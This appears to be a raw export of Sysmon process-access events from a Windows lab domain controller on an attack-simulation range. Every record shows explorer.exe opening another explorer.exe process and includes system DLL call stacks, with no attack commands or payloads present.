16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246144Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246143Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246142Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246141Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246140Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246139Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246138Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246137Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246136Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246135Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246134Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246133Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246132Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246131Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246130Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246129Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246128Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246127Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246126Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246125Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246124Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246123Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246122Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246121Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246120Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246119Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246118Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246117Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 